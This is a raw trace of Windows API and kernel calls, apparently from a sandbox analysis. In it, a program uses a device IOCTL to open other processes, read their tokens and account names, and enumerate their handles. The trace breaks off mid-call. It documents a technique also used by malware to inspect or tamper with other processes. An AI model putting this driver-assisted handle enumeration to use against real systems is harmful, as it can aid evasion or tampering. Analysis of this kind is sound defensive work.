ObfDereferenceObject (Object=0xffffe0006a441450) returned 0x7fff [0291.864] IoCompleteRequest () returned 0x0 [0291.864] PsLookupProcessByProcessId (in: ProcessId=0x998, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.864] PsAcquireProcessExitSynchronization () returned 0x0 [0291.864] KeStackAttachProcess (in: PROCESS=0xffffe0006a3e8840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a3e8840, ApcState=0xffffd000ac0cf400) [0291.864] ObReferenceObjectByHandle (in: Handle=0x10c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a66ebe0, HandleInformation=0x0) returned 0x0 [0291.864] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.864] PsReleaseProcessExitSynchronization () returned 0x2 [0291.864] ObfDereferenceObject (Object=0xffffe0006a3e8840) returned 0x28009 [0291.864] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a6177c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6177c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.864] ObfDereferenceObject (Object=0xffffe0006a66ebe0) returned 0x7fff [0291.864] IoCompleteRequest () returned 0x0 [0291.864] PsLookupProcessByProcessId (in: ProcessId=0x998, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.864] PsAcquireProcessExitSynchronization () returned 0x0 [0291.864] KeStackAttachProcess (in: PROCESS=0xffffe0006a3e8840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a3e8840, ApcState=0xffffd000ac0cf400) [0291.864] ObReferenceObjectByHandle (in: Handle=0x23c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a481830, HandleInformation=0x0) returned 0x0 [0291.864] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.864] PsReleaseProcessExitSynchronization () returned 0x2 [0291.864] ObfDereferenceObject (Object=0xffffe0006a3e8840) returned 0x28008 [0291.864] ObQueryNameString (in: Object=0xffffe0006a481830, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.864] ObfDereferenceObject (Object=0xffffe0006a481830) returned 0x7ff9 [0291.864] IoCompleteRequest () returned 0x0 [0291.864] PsLookupProcessByProcessId (in: ProcessId=0x998, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.864] PsAcquireProcessExitSynchronization () returned 0x0 [0291.864] KeStackAttachProcess (in: PROCESS=0xffffe0006a3e8840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a3e8840, ApcState=0xffffd000ac0cf400) [0291.864] ObReferenceObjectByHandle (in: Handle=0x248, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f51420, HandleInformation=0x0) returned 0x0 [0291.864] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.864] PsReleaseProcessExitSynchronization () returned 0x2 [0291.864] ObfDereferenceObject (Object=0xffffe0006a3e8840) returned 0x28007 [0291.864] ObQueryNameString (in: Object=0xffffe00069f51420, ObjectNameInfo=0xffffe0006a3d87c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3d87c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.864] ObfDereferenceObject (Object=0xffffe00069f51420) returned 0x7ffd [0291.864] IoCompleteRequest () returned 0x0 [0291.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf4c) returned 0x188 [0291.864] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.865] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00069943700, HandleInformation=0x0) returned 0x0 [0291.865] ObOpenObjectByPointer (in: Object=0xffffe00069943700, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000a5c) returned 0x0 [0291.865] ObfDereferenceObject (Object=0xffffe00069943700) returned 0x27fe6 [0291.865] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000a5c, DesiredAccess=0x8, TokenHandle=0xffffe0006a8c7380 | out: TokenHandle=0xffffe0006a8c7380*=0x18c) returned 0x0 [0291.865] ZwClose (Handle=0xffffffff80000a5c) returned 0x0 [0291.865] IoCompleteRequest () returned 0x0 [0291.865] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.865] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.865] CloseHandle (hObject=0x18c) returned 1 [0291.865] CloseHandle (hObject=0x188) returned 1 [0291.865] PsLookupProcessByProcessId (in: ProcessId=0xf4c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.865] PsAcquireProcessExitSynchronization () returned 0x0 [0291.865] KeStackAttachProcess (in: PROCESS=0xffffe00069943700, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069943700, ApcState=0xffffd000ac0cf400) [0291.865] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6b6920, HandleInformation=0x0) returned 0x0 [0291.865] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.865] PsReleaseProcessExitSynchronization () returned 0x2 [0291.865] ObfDereferenceObject (Object=0xffffe00069943700) returned 0x1ffe4 [0291.865] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.865] ObfDereferenceObject (Object=0xffffe0006a6b6920) returned 0x7fff [0291.865] IoCompleteRequest () returned 0x0 [0291.866] PsLookupProcessByProcessId (in: ProcessId=0xf4c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.866] PsAcquireProcessExitSynchronization () returned 0x0 [0291.866] KeStackAttachProcess (in: PROCESS=0xffffe00069943700, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069943700, ApcState=0xffffd000ac0cf400) [0291.866] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4a0420, HandleInformation=0x0) returned 0x0 [0291.866] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.866] PsReleaseProcessExitSynchronization () returned 0x2 [0291.866] ObfDereferenceObject (Object=0xffffe00069943700) returned 0x1ffe3 [0291.866] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.866] ObfDereferenceObject (Object=0xffffe0006a4a0420) returned 0x7fff [0291.866] IoCompleteRequest () returned 0x0 [0291.866] PsLookupProcessByProcessId (in: ProcessId=0xf4c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.866] PsAcquireProcessExitSynchronization () returned 0x0 [0291.866] KeStackAttachProcess (in: PROCESS=0xffffe00069943700, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069943700, ApcState=0xffffd000ac0cf400) [0291.866] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a48fb00, HandleInformation=0x0) returned 0x0 [0291.866] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.866] PsReleaseProcessExitSynchronization () returned 0x2 [0291.866] ObfDereferenceObject (Object=0xffffe00069943700) returned 0x1ffe2 [0291.866] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.866] ObfDereferenceObject (Object=0xffffe0006a48fb00) returned 0x7f94 [0291.866] IoCompleteRequest () returned 0x0 [0291.866] PsLookupProcessByProcessId (in: ProcessId=0xf4c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.866] PsAcquireProcessExitSynchronization () returned 0x0 [0291.866] KeStackAttachProcess (in: PROCESS=0xffffe00069943700, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069943700, ApcState=0xffffd000ac0cf400) [0291.866] ObReferenceObjectByHandle (in: Handle=0x30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4ec540, HandleInformation=0x0) returned 0x0 [0291.866] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.866] PsReleaseProcessExitSynchronization () returned 0x2 [0291.866] ObfDereferenceObject (Object=0xffffe00069943700) returned 0x1ffe1 [0291.866] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.866] ObfDereferenceObject (Object=0xffffe0006a4ec540) returned 0x7ffe [0291.866] IoCompleteRequest () returned 0x0 [0291.866] PsLookupProcessByProcessId (in: ProcessId=0xf4c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.866] PsAcquireProcessExitSynchronization () returned 0x0 [0291.866] KeStackAttachProcess (in: PROCESS=0xffffe00069943700, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069943700, ApcState=0xffffd000ac0cf400) [0291.866] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a8f32f0, HandleInformation=0x0) returned 0x0 [0291.866] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.866] PsReleaseProcessExitSynchronization () returned 0x2 [0291.866] ObfDereferenceObject (Object=0xffffe00069943700) returned 0x1ffe0 [0291.866] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.866] ObfDereferenceObject (Object=0xffffe0006a8f32f0) returned 0x7ffa [0291.866] IoCompleteRequest () returned 0x0 [0291.866] PsLookupProcessByProcessId (in: ProcessId=0xf4c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.866] PsAcquireProcessExitSynchronization () returned 0x0 [0291.866] KeStackAttachProcess (in: PROCESS=0xffffe00069943700, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069943700, ApcState=0xffffd000ac0cf400) [0291.866] ObReferenceObjectByHandle (in: Handle=0x3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006c39ddd0, HandleInformation=0x0) returned 0x0 [0291.867] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.867] PsReleaseProcessExitSynchronization () returned 0x2 [0291.867] ObfDereferenceObject (Object=0xffffe00069943700) returned 0x1ffdf [0291.867] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.867] ObfDereferenceObject (Object=0xffffe0006c39ddd0) returned 0xffbf [0291.867] IoCompleteRequest () returned 0x0 [0291.867] PsLookupProcessByProcessId (in: ProcessId=0xf4c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.867] PsAcquireProcessExitSynchronization () returned 0x0 [0291.867] KeStackAttachProcess (in: PROCESS=0xffffe00069943700, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069943700, ApcState=0xffffd000ac0cf400) [0291.867] ObReferenceObjectByHandle (in: Handle=0x40, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006c39ddd0, HandleInformation=0x0) returned 0x0 [0291.867] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.867] PsReleaseProcessExitSynchronization () returned 0x2 [0291.867] ObfDereferenceObject (Object=0xffffe00069943700) returned 0x1ffde [0291.867] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.867] ObfDereferenceObject (Object=0xffffe0006c39ddd0) returned 0xffbe [0291.867] IoCompleteRequest () returned 0x0 [0291.867] PsLookupProcessByProcessId (in: ProcessId=0xf4c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.867] PsAcquireProcessExitSynchronization () returned 0x0 [0291.867] KeStackAttachProcess (in: PROCESS=0xffffe00069943700, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069943700, ApcState=0xffffd000ac0cf400) [0291.867] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069304660, HandleInformation=0x0) returned 0x0 [0291.867] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.867] PsReleaseProcessExitSynchronization () returned 0x2 [0291.867] ObfDereferenceObject (Object=0xffffe00069943700) returned 0x1ffdd [0291.867] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe00069ba5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069ba5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.867] ObfDereferenceObject (Object=0xffffe00069304660) returned 0x7fff [0291.867] IoCompleteRequest () returned 0x0 [0291.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf90) returned 0x188 [0291.867] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.867] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006a0ca080, HandleInformation=0x0) returned 0x0 [0291.867] ObOpenObjectByPointer (in: Object=0xffffe0006a0ca080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000a5c) returned 0x0 [0291.867] ObfDereferenceObject (Object=0xffffe0006a0ca080) returned 0x2801f [0291.867] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000a5c, DesiredAccess=0x8, TokenHandle=0xffffe0006a8c7380 | out: TokenHandle=0xffffe0006a8c7380*=0x18c) returned 0x0 [0291.867] ZwClose (Handle=0xffffffff80000a5c) returned 0x0 [0291.867] IoCompleteRequest () returned 0x0 [0291.867] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.867] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.934] CloseHandle (hObject=0x18c) returned 1 [0291.934] CloseHandle (hObject=0x188) returned 1 [0291.934] PsLookupProcessByProcessId (in: ProcessId=0xf90, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.934] PsAcquireProcessExitSynchronization () returned 0x0 [0291.934] KeStackAttachProcess (in: PROCESS=0xffffe0006a0ca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0ca080, ApcState=0xffffd000ac0cf400) [0291.935] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6b4db0, HandleInformation=0x0) returned 0x0 [0291.935] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.935] PsReleaseProcessExitSynchronization () returned 0x2 [0291.935] ObfDereferenceObject (Object=0xffffe0006a0ca080) returned 0x2001d [0291.935] ObQueryNameString (in: Object=0xffffe0006a6b4db0, ObjectNameInfo=0xffffe00068a61044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068a61044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.935] ObfDereferenceObject (Object=0xffffe0006a6b4db0) returned 0x7f2a [0291.935] IoCompleteRequest () returned 0x0 [0291.935] PsLookupProcessByProcessId (in: ProcessId=0xf90, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.935] PsAcquireProcessExitSynchronization () returned 0x0 [0291.935] KeStackAttachProcess (in: PROCESS=0xffffe0006a0ca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0ca080, ApcState=0xffffd000ac0cf400) [0291.935] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068a81950, HandleInformation=0x0) returned 0x0 [0291.935] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.935] PsReleaseProcessExitSynchronization () returned 0x2 [0291.935] ObfDereferenceObject (Object=0xffffe0006a0ca080) returned 0x2001c [0291.935] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068524044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068524044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.935] ObfDereferenceObject (Object=0xffffe00068a81950) returned 0x7fff [0291.935] IoCompleteRequest () returned 0x0 [0291.935] PsLookupProcessByProcessId (in: ProcessId=0xf90, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.935] PsAcquireProcessExitSynchronization () returned 0x0 [0291.935] KeStackAttachProcess (in: PROCESS=0xffffe0006a0ca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0ca080, ApcState=0xffffd000ac0cf400) [0291.935] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069dd5780, HandleInformation=0x0) returned 0x0 [0291.935] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.935] PsReleaseProcessExitSynchronization () returned 0x2 [0291.935] ObfDereferenceObject (Object=0xffffe0006a0ca080) returned 0x2001b [0291.935] ObQueryNameString (in: Object=0xffffe00069dd5780, ObjectNameInfo=0xffffe0006a6a1044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6a1044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.935] ObfDereferenceObject (Object=0xffffe00069dd5780) returned 0x7fff [0291.935] IoCompleteRequest () returned 0x0 [0291.935] PsLookupProcessByProcessId (in: ProcessId=0xf90, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.935] PsAcquireProcessExitSynchronization () returned 0x0 [0291.935] KeStackAttachProcess (in: PROCESS=0xffffe0006a0ca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0ca080, ApcState=0xffffd000ac0cf400) [0291.935] ObReferenceObjectByHandle (in: Handle=0x1a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693f0a00, HandleInformation=0x0) returned 0x0 [0291.935] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.935] PsReleaseProcessExitSynchronization () returned 0x2 [0291.935] ObfDereferenceObject (Object=0xffffe0006a0ca080) returned 0x2001a [0291.935] ObQueryNameString (in: Object=0xffffe000693f0a00, ObjectNameInfo=0xffffe0006a717044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a717044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.935] ObfDereferenceObject (Object=0xffffe000693f0a00) returned 0x7fff [0291.935] IoCompleteRequest () returned 0x0 [0291.935] PsLookupProcessByProcessId (in: ProcessId=0xf90, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.935] PsAcquireProcessExitSynchronization () returned 0x0 [0291.935] KeStackAttachProcess (in: PROCESS=0xffffe0006a0ca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0ca080, ApcState=0xffffd000ac0cf400) [0291.935] ObReferenceObjectByHandle (in: Handle=0x1a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006c39da00, HandleInformation=0x0) returned 0x0 [0291.935] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.935] PsReleaseProcessExitSynchronization () returned 0x2 [0291.936] ObfDereferenceObject (Object=0xffffe0006a0ca080) returned 0x20019 [0291.936] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.936] ObfDereferenceObject (Object=0xffffe0006c39da00) returned 0x8000 [0291.936] IoCompleteRequest () returned 0x0 [0291.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdfc) returned 0x188 [0291.936] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.936] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006a292080, HandleInformation=0x0) returned 0x0 [0291.936] ObOpenObjectByPointer (in: Object=0xffffe0006a292080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000a4c) returned 0x0 [0291.936] ObfDereferenceObject (Object=0xffffe0006a292080) returned 0x27fe6 [0291.936] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000a4c, DesiredAccess=0x8, TokenHandle=0xffffe0006848ab00 | out: TokenHandle=0xffffe0006848ab00*=0x18c) returned 0x0 [0291.936] ZwClose (Handle=0xffffffff80000a4c) returned 0x0 [0291.936] IoCompleteRequest () returned 0x0 [0291.936] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.936] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.937] CloseHandle (hObject=0x18c) returned 1 [0291.937] CloseHandle (hObject=0x188) returned 1 [0291.937] PsLookupProcessByProcessId (in: ProcessId=0xdfc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.937] PsAcquireProcessExitSynchronization () returned 0x0 [0291.937] KeStackAttachProcess (in: PROCESS=0xffffe0006a292080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a292080, ApcState=0xffffd000ac0cf400) [0291.937] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a88b560, HandleInformation=0x0) returned 0x0 [0291.937] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.937] PsReleaseProcessExitSynchronization () returned 0x2 [0291.937] ObfDereferenceObject (Object=0xffffe0006a292080) returned 0x1ffe4 [0291.937] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.937] ObfDereferenceObject (Object=0xffffe0006a88b560) returned 0x7fff [0291.937] IoCompleteRequest () returned 0x0 [0291.937] PsLookupProcessByProcessId (in: ProcessId=0xdfc, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.937] PsAcquireProcessExitSynchronization () returned 0x0 [0291.937] KeStackAttachProcess (in: PROCESS=0xffffe0006a292080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a292080, ApcState=0xffffd000ac0cf400) [0291.937] ObReferenceObjectByHandle (in: Handle=0x28, 